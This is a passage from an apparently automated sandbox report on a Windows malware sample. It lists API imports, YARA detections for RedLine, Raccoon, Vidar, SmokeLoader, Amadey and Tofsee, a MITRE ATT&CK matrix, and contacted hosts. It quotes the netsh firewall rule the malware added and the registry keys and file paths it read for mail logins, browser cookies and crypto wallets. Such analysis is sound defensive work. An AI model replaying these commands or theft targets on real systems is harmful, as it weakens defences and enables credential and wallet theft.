riteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0041A069 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                          Lowering of HIPS / PFW / Operating System Security Settings:

                          barindex
                          Uses netsh to modify the Windows network and firewall settingsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Modifies the windows firewallShow sources
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.F65C.exe.401f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.F65C.exe.401f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000028.00000003.877844771.0000000003842000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.878164581.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.948415885.00000000002E2000.00000020.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.982145423.0000000006720000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.902114556.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.899275338.0000000003842000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000000.821341997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000000.819697566.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000000.820836278.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Amadeys stealer DLLShow sources
                          Source: Yara matchFile source: 00000027.00000003.860574341.0000000000700000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.953108316.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.952932110.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.888629779.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.885087344.0000000000820000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.873026509.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.890660521.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.873886365.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.874367341.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 10.0.rifsswe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.rifsswe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.0.rifsswe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.tijXCZsbGe.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.rifsswe.6315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.0.rifsswe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.1.rifsswe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.768056484.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719885078.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.708378047.0000000004DF1000.00000020.00020000.sdmp, type: MEMORY
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000029.00000002.953737182.0000000000821000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.953617420.00000000007C3000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.953715192.0000000000812000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 38.2.5C89.exe.4d40e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.4d40e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.3.5C89.exe.4de0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.3.5C89.exe.4de0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.920325973.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000003.917559502.0000000004DF0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.931172576.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 34.2.svchost.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.5d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.3.gecrjwsv.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.580e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.5a0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.E748.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.803962316.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.953428772.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.957118764.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.949927934.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000003.801375609.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.803904384.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.783551055.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E748.exe PID: 5476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gecrjwsv.exe PID: 2860, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6732, type: MEMORYSTR
                          Tries to steal Mail credentials (via file / registry access)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                          Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: electrum
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: electroncash
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: Jaxxa
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: Exodus
                          Source: F65C.exeString found in binary or memory: set_UseMachineKeyStore
                          Tries to harvest and steal browser information (history, passwords, etc)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Tries to steal Crypto Currency WalletsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: Yara matchFile source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR

                          Remote Access Functionality:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.F65C.exe.401f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.0.F65C.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.F65C.exe.401f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000028.00000003.877844771.0000000003842000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.878164581.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.948415885.00000000002E2000.00000020.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.982145423.0000000006720000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.902114556.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.899275338.0000000003842000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000000.821341997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000000.819697566.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000000.820836278.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 10.0.rifsswe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.rifsswe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.0.rifsswe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.tijXCZsbGe.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.rifsswe.6315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.0.rifsswe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.1.rifsswe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.768056484.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719885078.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.708378047.0000000004DF1000.00000020.00020000.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 38.2.5C89.exe.4d40e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.4d40e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.3.5C89.exe.4de0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.3.5C89.exe.4de0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.920325973.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000003.917559502.0000000004DF0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.931172576.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 34.2.svchost.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.5d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.3.gecrjwsv.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.580e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.5a0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.E748.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.803962316.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.953428772.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.957118764.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.949927934.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000003.801375609.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.803904384.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.783551055.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E748.exe PID: 5476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gecrjwsv.exe PID: 2860, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6732, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts1Windows Management Instrumentation221DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools211OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsNative API531Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsExploitation for Client Execution1Windows Service14Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsCommand and Scripting Interpreter3Scheduled Task/Job1Windows Service14Software Packing33NTDSSystem Information Discovery439Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsScheduled Task/Job1Network Logon ScriptProcess Injection713Timestomp1LSA SecretsSecurity Software Discovery871SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol36Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaService Execution3Rc.commonScheduled Task/Job1DLL Side-Loading1Cached Domain CredentialsProcess Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncVirtualization/Sandbox Evasion441Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Modify Registry1Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronAccess Token Manipulation1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchdVirtualization/Sandbox Evasion441KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskProcess Injection713GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
                          Trusted RelationshipPythonHypervisorProcess InjectionHidden Files and Directories1Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553073 Sample: tijXCZsbGe.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 87 185.215.113.35, 49890, 49891, 49893 WHOLESALECONNECTIONSNL Portugal 2->87 89 patmushta.info 2->89 91 microsoft-com.mail.protection.outlook.com 2->91 119 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->119 121 Multi AV Scanner detection for domain / URL 2->121 123 Antivirus detection for URL or domain 2->123 125 24 other signatures 2->125 11 tijXCZsbGe.exe 2->11         started        13 rifsswe 2->13         started        16 gecrjwsv.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 signatures5 20 tijXCZsbGe.exe 11->20         started        165 Machine Learning detection for dropped file 13->165 167 Contains functionality to inject code into remote processes 13->167 169 Injects a PE file into a foreign processes 13->169 23 rifsswe 13->23         started        171 Detected unpacking (changes PE section rights) 16->171 173 Detected unpacking (overwrites its own PE header) 16->173 175 Writes to foreign memory regions 16->175 177 Allocates memory in foreign processes 16->177 25 svchost.exe 16->25         started        28 WerFault.exe 18->28         started        process6 dnsIp7 153 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 20->153 155 Maps a DLL or memory area into another process 20->155 157 Checks if the current machine is a virtual machine (disk enumeration) 20->157 30 explorer.exe 10 20->30 injected 159 Creates a thread in another existing process (thread injection) 23->159 95 patmushta.info 185.188.183.61, 443, 49850 SUPERSERVERSDATACENTERRU Russian Federation 25->95 97 microsoft-com.mail.protection.outlook.com 40.93.207.0, 25, 49844 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 25->97 161 System process connects to network (likely due to code injection or exploit) 25->161 signatures8 process9 dnsIp10 105 185.233.81.115, 443, 49784 SUPERSERVERSDATACENTERRU Russian Federation 30->105 107 188.166.28.199, 80 